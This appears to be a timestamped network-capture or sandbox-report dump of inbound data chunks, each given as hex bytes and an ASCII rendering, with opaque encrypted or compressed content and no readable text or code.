                                                                                                                    2023-05-30 09:06:51 UTC39INData Raw: 8b 2c f8 9e a0 f3 71 f6 07 8f 43 75 9d 66 57 98 90 91 aa cd b3 f0 a9 3c d3 cb 49 91 01 e0 f6 76 18 8d e9 d9 ce 0e 06 a6 fa 20 88 ec 86 a9 84 6a 29 f0 4e a9 a3 f2 c5 cf 0c cc 57 d5 56 14 1a d9 25 de 2b 93 32 96 52 9b 26 0e ee 40 ac 38 ec 6f 95 fd 24 78 b2 b8 90 d7 76 f0 d7 af cd c5 93 7c af 8e 3e 2f 27 0a 63 47 45 84 1f e5 2b 5b 2f ce b0 4c 5a ea 56 73 4b 6a a8 3a 35 21 7b ff 9b bf 2a ef 08 fe e8 55 36 f0 f9 39 ce ad 71 25 41 6f 39 b7 2d 86 ad 5e 6e 45 ca 29 21 43 fe 99 07 72 56 f2 e7 27 2f d9 77 66 f7 84 ed 1c 73 f8 cc a8 1b 2c 14 79 38 aa 16 f0 1d 67 cf e8 53 34 ab 61 84 51 f1 fd 06 85 f3 7c ff cf 65 63 70 4a 4e e6 b4 1f e9 4d b1 7d 1c 50 13 88 fe ba 4d d1 8f 42 5e 1c 5e 91 dc a2 c4 2a 30 54 a8 19 55 12 25 26 00 46 0e b8 2d e7 96 39 ac ab 65 72 94 16 b4
                                                                                                                    Data Ascii: ,qCufW<Iv j)NWV%+2R&@8o$xv|>/'cGE+[/LZVsKj:5!{*U69q%Ao9-^nE)!CrV'/wfs,y8gS4aQ|ecpJNM}PMB^^*0TU%&F-9er
                                                                                                                    2023-05-30 09:06:51 UTC40INData Raw: 48 89 13 a5 55 c2 b3 60 c3 53 fa 29 53 c7 05 b9 0f bc 5e 5b 01 81 a9 bf 18 40 6b 4a 09 f9 83 91 41 ff 59 e7 15 89 a9 f1 da f8 27 7d 1a 8b d5 87 f4 a5 e3 d5 b2 9c 93 57 6c ed de 9a 88 a3 de 6e f8 ab a8 5a 00 a1 4e 90 e2 df 1c 34 11 a0 ea 6e cc 97 85 9c cd a3 4c b4 a7 85 3d 81 c4 f4 72 ab ee 00 73 8c 05 36 23 30 92 4c 5d 29 77 0d 8b 12 1a 47 d9 72 1e 71 d5 bb 84 79 40 04 86 a7 e9 63 53 4b 7e 9e 11 52 41 e9 06 4d 66 86 56 85 d8 04 59 6a e1 f7 dc 02 b4 24 15 34 6e cc 00 aa d8 df 6e 3a 54 36 c1 44 4a dd db a6 af 7e f1 c2 b4 55 2e 98 a5 56 7f be cc 84 0d 2e 72 0c 56 f6 87 e1 76 4c f0 bb 31 73 04 3e 25 71 63 dc d6 ea 4f 6c ff b4 db af 09 85 35 2d 9e 6c 6e 39 31 b5 8d 7b 0e 12 cd 55 84 db c0 bd 58 6c 02 3e 21 33 89 35 63 ec 19 1b 48 78 6a 05 2c e9 2c 12 79 6d bd
                                                                                                                    Data Ascii: HU`S)S^[@kJAY'}WlnZN4nL=rs6#0L])wGrqy@cSK~RAMfVYj$4nn:T6DJ~U.V.rVvL1s>%qcOl5-ln91{UXl>!35cHxj,,ym
                                                                                                                    2023-05-30 09:06:51 UTC41INData Raw: d5 87 bb e5 ec 5a 78 ad 32 bd 74 75 61 7f 9f 39 51 63 cb 2b 50 10 d9 fb fc 43 74 5f e0 28 d9 dc 57 94 98 ca bf 6c b7 c1 fd 0c 3a 63 40 47 68 aa 5c 20 8b 03 e2 e3 51 7a 87 d3 d3 07 b3 61 57 2b 16 e3 73 6b d2 cd b4 a4 e9 75 e7 fa 24 62 02 bf f3 63 d2 2a 5a a2 2a 80 47 31 f0 f5 31 12 2b 86 0a c7 bf a3 a1 fd f1 73 ce 03 db 71 e5 78 d9 da 36 1e 9e 51 fe bf 72 e4 ca 47 a9 1f 02 d0 93 3e 37 04 e6 aa 34 f1 3a 1b fc 32 7c fc 07 ef 81 60 71 79 74 cc 91 61 04 8b 5f 16 11 ba 61 41 ab c0 37 cc 97 1a 1c 93 ff 1c 9b 2d 64 ed f1 92 40 3f a7 35 4d 07 f8 02 70 4f 5f 0f 1d a3 c0 98 2a c7 4b 38 47 ab f3 a2 e4 1c 77 ae 1d d6 88 59 5f bf 1c 63 65 df 4b 17 3a 87 d1 88 8a 0d 6e b6 06 61 17 ec 11 02 4a a1 0f 4a 0f 30 23 32 15 af f2 16 62 a6 57 79 7d b2 e5 a9 00 7b b3 15 5b ad 82
                                                                                                                    Data Ascii: Zx2tua9Qc+PCt_(Wl:c@Gh\ QzaW+sku$bc*Z*G11+sqx6QrG>74:2|`qyta_aA7-d@?5MpO_*K8GwY_ceK:naJJ0#2bWy}{[
                                                                                                                    2023-05-30 09:06:51 UTC42INData Raw: 66 f9 85 70 92 96 de 51 7f 84 1e ee cf 41 99 e7 7b fb 39 06 65 e4 f6 e3 c3 d7 f1 41 1a 96 6d c3 21 12 8e e3 16 1a 5e cb e8 af 68 8c 67 c1 ef 89 8b 8d cc 62 92 39 18 4f 9d c0 58 d4 6f a9 52 1e b6 e5 9e ba f6 e4 62 a1 63 33 1e 2c a8 9f 79 70 77 6f e5 45 b0 c2 c9 bc 86 40 00 2e 6e c8 2a 0b 77 90 9d c1 ef 3d 31 81 6a 68 81 ce 35 16 fe 81 d9 3d d1 65 5f 53 ad 38 1c c3 c1 f1 82 63 d9 96 05 95 4b 71 7c c4 ab 4d d4 4d 16 be bb 7c 1e db b8 19 af 43 92 3c 3a 82 f5 cd 72 b6 0a 85 b2 d9 8e ee 77 52 e0 ce 76 60 e3 97 35 31 2a 07 d3 5a d3 b2 50 46 3d 04 c7 41 6d 91 b0 90 23 73 49 0d df c5 12 74 16 f5 7d be a8 8b 9b 7c 05 8a fb fd 30 4b 22 b1 93 2d f6 ee dd 0d e5 37 de 70 7f 56 1c 98 1a 39 8f 4c 60 c9 f0 7c ee 1e d4 65 3f 13 07 b7 2b be 0e 5d 59 b5 c7 c8 c1 43 9d db 88
                                                                                                                    Data Ascii: fpQA{9eAm!^hgb9OXoRbc3,ypwoE@.n*w=1jh5=e_S8cKq|MM|C<:rwRv`51*ZPF=Am#sIt}|0K"-7pV9L`|e?+]YC
                                                                                                                    2023-05-30 09:06:51 UTC43INData Raw: dd 34 25 d6 e2 73 da 8c ad df 55 84 50 ac a6 84 26 89 d9 76 49 a5 1f 4c b4 b2 d4 99 2d 47 84 f0 8b 44 c9 f7 36 37 41 e6 17 5c f8 8c a8 41 0f 45 f0 48 67 cf a6 23 40 ef cb 30 a9 d8 ca d3 cf ac c1 24 e7 22 04 16 31 db 03 7b cb 8a c3 d4 32 83 9c 0c 41 1c ae 30 2a d2 e6 ae b5 07 37 3d 5d ec 8c 95 21 32 bd a0 95 a6 f0 5c 8a 9b 09 23 3d 1e de 46 75 f4 da 02 13 ae 75 77 1b 86 21 eb a4 18 c0 1e 50 d8 c5 e7 63 f3 66 8d a6 9b a1 04 dc 5b db cc 27 6f ae 0b 4d 7f f6 3e 96 59 b0 22 33 c7 6c 2e 88 54 e8 4d d4 ba b6 08 ea bd 51 02 8a c5 65 48 47 d9 41 68 9b 3c 67 0e 12 cb ae e8 49 3e 12 53 1e 37 55 82 1d 49 b0 d5 02 b7 55 76 31 d0 89 b1 02 b5 4c 2b 47 bb 59 96 7f eb 6b 4a 06 b9 2f e7 13 0d 87 78 ac a1 bb 5e 7d 7e cf 7f 48 99 57 a1 14 83 e5 30 a4 32 8c f3 8d fa 75 14 46
                                                                                                                    Data Ascii: 4%sUP&vIL-GD67A\AEHg#@0$"1{2A0*7=]!2\#=Fuuw!Pcf['oM>Y"3l.TMQeHGAh<gI>S7UIUv1L+GYkJ/x^}~HW02uF
                                                                                                                    2023-05-30 09:06:51 UTC45INData Raw: bb c1 ec 62 42 76 c6 d4 14 8c 77 48 11 3e 8c 05 47 d7 22 00 10 74 69 68 b4 b1 ce fb 34 68 43 e0 3d 30 0d cd a4 c0 d3 27 f3 80 a7 f5 dd f5 8e 01 ae 24 ec de b9 18 bf 0f f0 8f ba 5f 7f 70 1c 4a 5f ae ce a5 2d 76 c0 49 f0 a0 87 52 f5 af 82 50 7b 27 0c e9 1f 5b e7 d5 f5 88 12 02 16 8b ec 19 9b 4d 08 61 7a 16 2b 9a 29 a7 68 11 28 b0 c8 26 cd 2c b3 a6 3d d6 3b 93 39 90 3b 1d b9 1c ed f5 0f c7 20 91 2d 77 71 cc 0a e9 a4 9c e4 19 92 4c aa db a1 7e b4 36 ec b9 be 84 24 cb 4b 18 2a d8 55 4c a0 b7 51 ad ce 9b 65 05 4d 23 70 8f 20 75 7b b5 69 42 e9 4c 32 1a 95 4d 47 a9 6d 51 4a f2 71 a1 67 dc 39 0d c9 c0 2a 39 b4 97 96 9f bd 01 fa 61 53 1c 7e d1 33 ed 07 d4 a7 e5 7b fb 68 b1 cd b4 6f 25 e6 48 7a 12 6e e8 d1 e9 eb 7e 75 36 da bb 89 43 fc 5e c8 39 a7 a3 f9 95 25 41 4b
                                                                                                                    Data Ascii: bBvwH>G"tih4hC=0'$_pJ_-vIRP{'[Maz+)h(&,=;9; -wqL~6$K*ULQeM#p u{iBL2MGmQJqg9*9aS~3{ho%Hzn~u6C^9%AK
                                                                                                                    2023-05-30 09:06:51 UTC46INData Raw: 75 5a 80 bd 29 e5 b4 79 26 7c bd 9a 32 60 e3 94 38 10 48 79 48 f8 53 ad cb 95 aa 4a c7 f4 60 85 82 d3 f1 34 1f 87 08 54 3d be 00 97 50 92 59 25 44 33 d6 a6 f6 c7 a3 b9 ba 8c e1 d1 9d a0 6f 80 3c a8 00 04 42 16 e8 7b 3f ba f4 2a 2b 3f 8d af 8c da 42 48 85 01 6c 81 20 c5 2c 91 f9 6e c3 e8 c5 b9 68 a9 a1 14 d9 1c 84 84 b1 2b 8f 55 41 9f 8b 0c b3 1e 34 2a 2f d8 4e d7 ed 95 67 29 ba bd 9e e2 03 05 cc d9 e7 44 14 7a 23 6d 44 a1 3e aa 02 e0 01 10 17 91 e9 43 0f 7b 1e 17 97 8d ed 06 f1 97 09 1e f9 30 8b e7 d0 23 61 1f 43 f0 50 b3 0f c4 62 d7 2e b0 78 86 df a8 df f7 04 eb b7 c9 f9 53 e9 d6 57 48 d2 87 55 31 43 0a a7 79 df 35 d2 0f 37 59 f3 ae 49 67 77 9d 89 13 6d 5e 2a b1 05 61 2f 68 d9 b2 a4 78 6a 24 94 73 f4 95 a6 21 da d9 35 b0 14 43 aa 28 49 e5 76 a9 ba 6d 38
                                                                                                                    Data Ascii: uZ)y&|2`8HyHSJ`4T=PY%D3o<B{?*+?BHl ,nh+UA4*/Ng)Dz#mD>C{0#aCPb.xSWHU1Cy57YIgwm^*a/hxj$s!5C(Ivm8
                                                                                                                    2023-05-30 09:06:51 UTC47INData Raw: 92 67 ca 8e a3 25 91 89 69 d3 07 f5 02 b1 5b b6 e5 fe da f1 b8 49 11 f7 bc 27 10 f8 49 3d 03 ea f0 96 6b 48 bb 5d e9 71 f3 d2 21 53 b1 6a ef 4d 40 bf 54 99 3c 38 6a 52 39 69 b6 97 0f a9 85 8b aa 52 72 23 36 38 72 c7 06 e0 ef 2d cc b5 01 37 7f 52 0d 98 99 15 c0 07 e7 12 09 ea fd 36 fd 61 bb c7 c9 ba 0f 61 d8 af 97 7f 4e 9d ce c9 ff 5e ba 94 d0 68 00 65 fb 6f b7 0c f8 d7 36 d3 6f c3 fa 01 02 f8 eb 77 54 4f 89 e6 d0 d8 57 2f f9 06 11 0b 24 d8 23 28 e1 b0 a1 9a 29 08 da f5 b6 75 13 d0 bb 64 32 bd 98 3e 12 39 54 df 8b 9c d6 41 1b 97 e9 4c 87 89 58 a3 f0 87 fe 68 a5 df bd 41 74 67 91 c5 86 cf 1f d2 e0 57 38 53 e0 bc d3 bb c5 c3 4c 32 6e 96 1a b6 09 3a 33 b0 f0 93 e0 a7 ea 94 c7 ad 2a 98 4c fc fb ca 98 87 58 9c c3 03 34 ac f4 7a c2 40 0b 71 f3 36 e9 68 36 1d ea
                                                                                                                    Data Ascii: g%i[I'I=kH]q!SjM@T<8jR9iRr#68r-7R6aaN^heo6owTOW/$#()ud2>9TALXhAtgW8SL2n:3*LX4z@q6h6
                                                                                                                    2023-05-30 09:06:51 UTC48INData Raw: 15 44 33 eb 55 c8 9a 84 de f8 d2 5c 2d 16 fe 12 cc bc 54 0c 39 c7 ef 41 a0 57 50 de de 09 95 c1 1d 82 aa b0 b3 c1 fe 26 f1 ec 2e 4b 8d 43 b1 dd ff 40 dc 56 c1 ea 60 25 75 ca d0 f5 34 76 13 e7 5c 7e b6 74 58 05 2f 57 b3 5d 38 a4 25 a0 e0 1b e7 47 ee f8 37 ca 16 dd 20 d8 5a 1e a3 33 7f a3 f9 8f ae d0 fa 15 0c 6d c9 56 04 28 26 76 92 20 5c f3 bc f7 ee c9 06 8e 40 a2 e8 31 4d 17 ef 50 13 6d 9c 50 5b 3e 80 c4 73 be 7a 34 e2 77 e5 33 ce af 30 ba ba fd b3 ff d4 a9 c8 36 5f 8e 5c 4d 0f 94 6d d6 4a f0 a7 f0 96 07 1f 59 02 6a 4c b2 6b 53 04 fa 05 c4 46 2d 64 4d ce 73 31 55 17 20 f4 7a 3c 9f 45 ce 3d 8c df 5c f4 e3 c8 50 d7 f0 96 ef 95 94 3b d0 da 8f a8 c3 84 70 6a a1 8c 50 51 61 21 41 b1 9f 23 3d 2f 17 66 2f 6a a8 c2 44 8a c3 2a 7f d0 71 26 a5 93 82 cd 5d ff 77 24
                                                                                                                    Data Ascii: D3U\-T9AWP&.KC@V`%u4v\~tX/W]8%G7 Z3mV(&v \@1MPmP[>sz4w306_\MmJYjLkSF-dMs1U z<E=\P;pjPQa!A#=/f/jD*q&]w$
                                                                                                                    2023-05-30 09:06:51 UTC50INData Raw: 47 bc 0b 2f 11 f8 67 d1 25 51 19 7d 38 f2 62 3e ef ca 19 83 0a ca 5a 2b 53 7e df 1c c4 84 7a 2b 19 be 02 58 a2 9e c1 7e 66 01 a8 70 e0 00 64 28 4a 41 56 ba e8 dd 12 a7 25 f0 a2 47 03 de f5 3c b0 d1 78 70 48 5b bc d8 5f b6 82 dc 12 d1 46 7a 49 41 fd 4e 5e d2 ce 54 78 f0 a7 dc c5 0e 1e 33 e4 97 91 1d 85 aa 94 e0 e9 70 63 99
                                                                                                                    Data Ascii: G/g%Q}8b>Z+S~z+X~fpd(JAV%G<xpH[_FzIAN^Tx3pc
                                                                                                                    2023-05-30 09:06:51 UTC50INData Raw: 40 d0 89 c9 34 7e e6 96 e1 e3 52 2d 46 d9 94 17 b6 55 f0 b1 3a 1a 52 9a ef d5 50 87 0d 05 14 7f e1 7e f3 cb e9 bf e0 f4 50 20 1a 08 f0 ff 9c c7 50 7f f7 14 b1 71 1b 9d 54 d8 a4 c5 b4 fd de ac 73 a3 51 94 84 28 92 c3 7a ea 56 c4 56 53 96 3a b0 1d 37 9e d0 84 31 ab 14 5d 7a 82 85 a1 96 9f 18 ad ca fc a4 19 42 5b 72 27 a7 fd d8 7f 4c 2c 60 ea 60 a5 af c2 1d 00 b2 c6 26 96 e7 88 ad 7d 5d e4 f2 70 ef ab f4 ea 9c a0 0d 5c 3b bc 78 f5 93 c8 ad ff 9a 85 ae 83 8e 6b ec ec ee 3b e1 cf b3 26 ae d0 30 af 52 be f9 15 ed 1f 22 f6 df c5 44 ee 55 86 75 13 31 54 e9 d6 7e a7 88 38 b2 ac 9d 33 b4 bf 62 28 cb 94 00 91 ee c7 f5 d2 8c a2 21 24 c2 e9 61 9b 30 b6 e5 13 85 f1 36 93 d5 e5 50 2e 68 0c a8 6d 01 1b ee 1c c5 4e 8f 73 2b 9c 1a 2b 54 53 6d 74 1b d8 26 33 79 ba 35 80 c8
                                                                                                                    Data Ascii: @4~R-FU:RP~P PqTsQ(zVVS:71]zB[r'L,``&}]p\;xk;&0R"DUu1T~83b(!$a06P.hmNs++TSmt&3y5
                                                                                                                    2023-05-30 09:06:51 UTC51INData Raw: 24 3c 40 fa b5 96 d0 df 3c 98 e2 08 2c fa 79 6f f0 7d d4 53 48 03 cf 68 a7 4a b9 db 0e 32 26 c8 8d 9c 85 22 a3 96 f5 c3 f7 47 4b 98 f4 a1 f1 69 0d 75 35 82 c4 5b 2e 49 67 44 36 0f 03 a8 e9 24 6f df bc e8 89 c6 d5 dc 6f c7 2b 07 62 fc 31 4a 7c 12 84 57 38 db a0 d7 fe 92 f8 21 02 fc db 97 17 34 3f 34 19 3d 98 fc ba 4a 50 a3 22 d9 37 9b 5e 29 83 57 0c 40 1b a4 70 95 e9 df a0 33 38 9e 69 d4 22 8e e4 7b 17 28 e7 71 fc 6a 59 6f d9 cc 34 3f a4 ed 50 20 25 1a b8 13 30 2f 81 db 3a 1a 5c 82 53 d9 97 5a 72 a4 c9 a2 3b 3d 42 ef d0 ab 9b d9 c9 19 09 8f 68 83 de 70 92 a9 eb 8f 0f a0 0c 4b c0 00 cc cd e2 bc 16 38 ea c9 34 d0 a1 08 68 db 14 ec 49 3b d8 11 aa 5f 16 a1 f6 4d 28 04 4a e9 87 fd e5 1a 1d 07 cf 8b 5d c3 d7 d6 e5 23 a5 92 18 25 4d 61 7e 1c cc 86 48 70 d3 66 b9
                                                                                                                    Data Ascii: $<@<,yo}SHhJ2&"GKiu5[.IgD6$oo+b1J|W8!4?4=JP"7^)W@p38i"{(qjYo4?P %0/:\SZr;=BhpK84hI;_M(J]#%Ma~Hpf
                                                                                                                    2023-05-30 09:06:51 UTC52INData Raw: 98 e8 02 35 4a 8d 37 ed 9f b3 7b cb c7 44 55 dd a2 24 49 02 45 ff ab a2 f7 ed b9 3c b4 bc 3d 41 cf fa 7c d0 b5 fc f6 45 50 d9 f6 9c 23 c0 d9 c0 cd ce a1 35 97 6c 95 46 2d e3 41 82 1a f6 fa f2 40 6e e8 50 54 36 b1 92 94 de a7 95 e0 8c c3 9a a1 88 9e a3 9a 03 1e 87 6d 4e 60 9e 96 c2 71 94 56 f8 eb 96 17 97 bf b4 92 9b 6b 24 45 b6 95 9d b5 c9 0a 34 31 1d 8f 26 42 15 37 4c 1d e9 11 5a a7 0b 92 6f 84 c9 41 e7 50 e7 70 a4 27 05 98 e0 43 f4 c5 2b d1 31 15 5e a4 a7 27 09 f5 1c c2 24 a0 19 9c 64 27 df d1 42 80 31 ca 22 1b 42 5e bd 7a 89 de 7b 02 5a a2 fc 00 a1 2b 2b d3 22 f1 81 37 95 7a f7 3f d8 77 5d 77 ff fb 2f c0 dd 28 6e 54 9e 57 c3 d8 c3 0b 8e 82 96 f4 4c 92 1c 6a 6f bc 8a 98 3e cf da f0 ed 7a 7a 86 52 a8 b0 80 28 d8 64 ca 79 98 38 d2 53 99 a1 09 a9 b2 d5 ce
                                                                                                                    Data Ascii: 5J7{DU$IE<=A|EP#5lF-A@nPT6mN`qVk$E41&B7LZoAPp'C+1^'$d'B1"B^z{Z++"7z?w]w/(nTWLjo>zzR(dy8S
                                                                                                                    2023-05-30 09:06:51 UTC53INData Raw: 4c 37 7e de 20 e5 54 68 af 38 a2 ae 95 b2 d1 4c c8 47 0e 52 15 b3 ee e1 6b 2a b8 4a 41 9f cf a1 ca 81 7b 42 39 da 9e c0 40 0c 9b c7 69 87 3d 7a 97 85 51 93 02 a2 6e 5f bc cb 69 6a 29 2f 05 75 b4 96 9b 3a ce c6 5a 46 24 9e 8c ce 52 b1 6e af 9c 73 00 2a 93 8f cf df 53 be f7 9c 8c 38 d3 fc e5 b9 dd 4d f9 c2 3f f0 05 e8 30 a7 e9 e6 f5 fc e5 b7 33 c8 90 4a a2 f8 7c ba 93 fc 14 32 4f 5b 4a 0b 68 f7 0f 0f ec 3a 10 d5 3f f1 58 37 ff 26 6f cb 27 b0 66 44 1b 7c 16 ad 1e 4f 3e 17 3f 98 f9 32 de 44 9d 7f 08 bf 15 89 ba 30 a1 a9 e9 6a 88 3a df 17 86 a8 ae 98 69 92 94 e7 5d 8e 2f bd af 75 c2 3b 79 e8 06 80 bc e4 d3 b8 85 73 8e 8b bd a1 e6 30 61 8c 11 86 ac 99 cf ad 75 ab 92 5b db 70 53 f5 c9 6f 6d 2d e1 67 86 65 ee 6f 27 c8 0e 98 b4 8d 79 96 36 54 7f b5 05 42 e1 c0 e6
                                                                                                                    Data Ascii: L7~ Th8LGRk*JA{B9@i=zQn_ij)/u:ZF$Rns*S8M?03J|2O[Jh:?X7&o'fD|O>?2D0j:i]/u;ys0au[pSom-geo'y6TB
                                                                                                                    2023-05-30 09:06:51 UTC55INData Raw: 37 eb 37 08 b2 22 2d 54 39 06 38 58 2c c2 72 0c 7e 30 1b 29 a4 dc 41 3b 51 8b 4c 09 90 e9 fe 42 ce 6d ad 9b c7 0d 8f 3c ea f4 de aa f1 4d 2e 27 69 a8 cf 74 f6 3c 1a 5c 54 27 69 e7 87 42 c4 ce 5b b7 f9 b6 aa 67 f5 50 b4 9f ce 17 3b 99 97 9a d7 59 e3 88 d1 03 d5 e2 78 99 36 44 d0 bd 47 00 e7 52 a6 ce cf dd eb 42 75 77 f8 bf a8 d0 9b 6f 07 1b 3a 9e ea b9 89 38 f2 6e 11 01 39 f9 0d be 9c 0b 70 1a 7a 97 dd 1e b9 e7 b9 8a 7f 2a 1f b1 6f c8 aa 0f c8 54 24 8a c5 12 d5 3f e8 42 ba ce c4 9f d7 0a 39 ed de f3 24 fb 04 20 61 45 76 7c d9 83 ef e3 0d f4 3e 66 28 a0 40 2e 72 a9 3f 76 8b 65 34 2d 56 77 a4 21 56 bb 0c a5 c3 d6 76 88 58 7c 5d d6 e0 fc 48 ce f6 ec ef 29 0c 25 4b d0 dd 03 90 ce 91 92 3e ca cb 28 ff c8 0d f1 f8 93 bb 47 34 08 4e 60 f7 24 ae 8d fb bf a6 6d 6c
                                                                                                                    Data Ascii: 77"-T98X,r~0)A;QLBm<M.'it<\T'iB[gP;Yx6DGRBuwo:8n9pz*oT$?B9$ aEv|>f(@.r?ve4-Vw!VvX|]H)%K>(G4N`$ml
                                                                                                                    2023-05-30 09:06:51 UTC56INData Raw: 33 78 bf 63 e7 29 74 0e f7 62 78 21 af f9 ad 91 fe 2a f9 9f 63 2a e4 57 f9 0b a2 f2 eb 83 a8 d1 7e 22 c9 74 52 77 50 d2 65 ea 8b 64 4d c5 6a 9b f2 e8 13 26 0f 4d 4c c6 d7 45 fe 25 69 81 36 cf 34 22 b3 31 b9 17 65 a2 5e 46 67 45 1b 38 b0 74 ee 5f 22 4b 18 b0 d2 e0 ef 40 a8 c4 62 74 09 3b 89 26 d2 3c 2f 5f 9d 10 8a a2 77 1c cb 4b 18 f4 f9 96 fe 63 dc b4 e3 3d 88 ba 2f 38 70 4e ea 67 f2 88 6d fd 4d b2 54 62 2b 13 41 9b e0 86 d3 38 5a 5b 85 9f fa 06 31 d8 a0 c6 12 e5 25 f7 16 b2 09 59 5b 4d 35 8c 71 22 23 fc 90 c5 ae 47 1e 46 ba c5 2b 81 e6 cb 32 2a 03 bd 9a fe e5 e4 7b da 23 43 d7 b1 fc 8c ff b5 bb 3a 43 42 59 09 71 6c 96 96 9b 9f cf c8 a8 d0 01 74 73 49 ea 2e ee fa 08 f8 e3 5e e0 88 71 d6 82 7d 9f 46 66 13 4f 5f 7f 84 23 e4 1f 09 b9 ba c8 89 5e f3 7d 40 1e
                                                                                                                    Data Ascii: 3xc)tbx!*c*W~"tRwPedMj&MLE%i64"1e^FgE8t_"K@bt;&</_wKc=/8pNgmMTb+A8Z[1%Y[M5q"#GF+2*{#C:CBYqltsI.^q}FfO_#^}@
                                                                                                                    2023-05-30 09:06:51 UTC57INData Raw: 62 11 34 2f 64 ad 71 37 78 80 1f 04 e4 b4 05 68 5e 10 23 28 ef 55 43 44 28 96 77 7c fd b0 13 a5 11 82 bd f0 9d e6 ca a0 d6 41 d0 11 92 f9 96 8d a5 29 10 78 9e d7 18 eb b9 40 2b c0 9c 40 39 ce ea cd 1c 16 f5 25 ba be 25 68 93 f5 b9 6a 09 d8 d6 c5 11 b6 65 74 2f e6 03 0f 4b c9 01 44 a4 45 31 19 e9 ce 64 88 f2 03 1e 2f b0 e5 22 0e 52 a5 cc c0 48 34 6f 78 54 f5 33 88 1c 9c 2e d8 73 08 dd 52 49 74 4a 38 3b ea 0a b1 52 a4 2b 03 c9 4f 7c 7a 38 93 78 e6 ac 22 6f 0a bd 4d 61 91 68 20 85 f0 93 62 03 a3 25 a0 f2 fd be 35 27 13 76 04 4e 7f 94 19 6e 7f 8f 54 bd e9 c3 4e 34 a1 7d a3 b5 c3 76 55 bd 19 94 2d 14 7b c0 e4 cb 36 e2 12 bf 17 3b d6 b8 60 71 b9 8c f7 70 f3 ef fa b1 9e 6b 8a 13 58 9c d4 21 68 28 ed 4a d9 05 0e da 2b 00 49 b4 85 68 46 75 04 03 a5 c0 bb 40 40 48
                                                                                                                    Data Ascii: b4/dq7xh^#(UCD(w|A)x@+@9%%hjet/KDE1d/"RH4oxT3.sRItJ8;R+O|z8x"oMah b%5'vNnTN4}vU-{6;`qpkX!h(J+IhFu@@H
                                                                                                                    2023-05-30 09:06:51 UTC58INData Raw: 5e 12 01 f0 78 df 77 69 f5 24 5d 5d 49 e4 d0 23 fd 1c 5b f9 31 f6 94 18 06 f5 26 8a af 02 a8 e4 25 db 76 08 97 a2 82 c6 ba 65 91 9e 3e be d6 f2 c9 af 01 b0 b8 1f 6c 92 30 74 a5 09 5c 3c e6 d0 c7 dc ca 9c 34 f4 7a 8e 94 b7 cb b1 bd cb 50 cb 9b e1 00 17 3d 18 ec 0e 8d 62 3e 5c 0b 19 f1 c3 06 d0 00 19 bf 2f c6 69 78 b6 0a 92 a0 73 40 a1 2e 96 91 1b 37 24 df b4 b9 1d cb b1 84 ee 5a ce 3e fc bb f7 ae 4e ec 86 74 b1 1c 8d 77 97 ed 95 83 61 c8 3e 89 1b e6 e6 f6 2a 9a ff 79 aa e5 b2 3d 91 4a 59 cd e7 41 de 70 ee b3 b5 5d 7f dd 1f 07 63 11 89 49 81 e3 bc 2d 2e 8c 4f 94 e6 3c 02 a3 e6 dd 32 de 77 e6 a4 1e 63 5a d4 30 73 f0 67 47 9d c3 17 83 cc bc 13 87 95 5a bb 5b 58 eb 8a f2 39 83 4e 35 2c b8 90 ec 7d 1d 93 5f d2 60 66 81 5d 8f 85 4f 35 cd e0 9e 86 45 64 48 ed d2
                                                                                                                    Data Ascii: ^xwi$]]I#[1&%ve>l0t\<4zP=b>\/ixs@.7$Z>Ntwa>*y=JYAp]cI-.O<2wcZ0sgGZ[X9N5,}_`f]O5EdH
                                                                                                                    2023-05-30 09:06:51 UTC59INData Raw: 23 f1 c2 5c 49 e2 2a 89 f7 d3 8b 87 bd e0 99 e7 64 84 77 d7 df 9c f7 db de 1c 7c 18 e5 ce d5 b7 0c 67 14 3f 6a ba 4a 32 df 46 c4 d6 55 13 3e b4 2a c0 0d 52 98 fd 85 68 d5 c7 67 b8 7d 1b 4d 28 77 08 c8 2c cd cf 07 f1 46 78 4a 60 b1 49 5a eb 61 1b 62 6b 3a fe 82 6f c5 dd 14 84 39 7d 10 13 22 65 e4 90 88 8c f0 63 c5 05 b7 b6 aa 5e 1f b4 66 6a ae fc 0b 35 89 02 8d f6 70 ef c1 b6 d5 1b ea 8f f8 b8 9e ec 69 68 ef 31 e7 71 e0 c3 9f 47 52 23 24 85 b6 46 9c 7e e5 db 92 23 3c 15 bd 45 d4 84 7f 4a 9b 16 f3 ac b5 98 ab 26 81 8b f3 41 b3 47 e4 db 1f 5e f8 37 48 ed 7a 91 ab 3a e5 90 b4 85 7b f7 d5 55 53 8c e1 81 16 33 97 ca c5 bd e2 16 0c 10 2f 2a 53 71 91 ff d3 a9 1a 31 92 5f 52 2c 62 2e 5c d0 f6 1b 34 73 2d 25 8f e0 4c 90 12 cd c9 cf 8f 55 e5 f3 b9 8b d7 6c 07 ef 83
                                                                                                                    Data Ascii: #\I*dw|g?jJ2FU>*Rhg}M(w,FxJ`IZabk:o9}"ec^fj5pih1qGR#$F~#<EJ&AG^7Hz:{US3/*Sq1_R,b.\4s-%LUl
                                                                                                                    2023-05-30 09:06:51 UTC61INData Raw: f1 f1 bb d0 20 fd 09 2d 28 1c 90 1a c6 be 3b e5 86 7f a9 60 b1 c1 10 64 8b b0 31 34 f3 c1 87 be c5 85 ff e7 d4 ff bc d0 9f cd 47 b1 b6 d3 45 e3 95 72 6a 96 b7 fe a5 35 69 57 a7 3a 96 72 c6 79 11 87 25 3a a7 f4 f7 ea 9a 30 d7 25 b1 6c ca e4 1e 7f 6e 55 f4 d3 89 b9 04 e7 6d 33 5d 4e f1 20 03 4a 82 de f9 7e ac d8 f7 a2 26 2a af b2 29 a1 9b 4a 8a a5 9d 45 aa 4b c8 ed e1 40 8a da da 39 b7 9d 7a 38 a5 bd 92 af 7e 18 28 c4 28 46 bd 67 ad 23 6b 12 c5 7f 9b a6 0b 50 f8 3b df c7 08 ba 75 11 6d 9b d1 37 a1 1c 6b 76 c3 b5 05 f9 87 7e 13 e5 db 7d d3 7d bd 8b 90 06 b9 1c f7 01 6d 3e 9b c1 0e 35 e7 74 75 4c bc 28 79 0b eb aa 77 c8 3c ab 3f 0d f8 00 c6 2b 6a 3a 7f 32 21 72 a3 62 b3 cc c2 80 3a 76 5d e2 2b 5b d8 3a 3b 33 f1 fe cc 81 46 20 4f 2c a7 21 a1 95 c8 12 c9 4a c7
                                                                                                                    Data Ascii: -(;`d14GErj5iW:ry%:0%lnUm3]N J~&*)JEK@9z8~((Fg#kP;um7kv~}}m>5tuL(yw<?+j:2!rb:v]+[:;3F O,!J
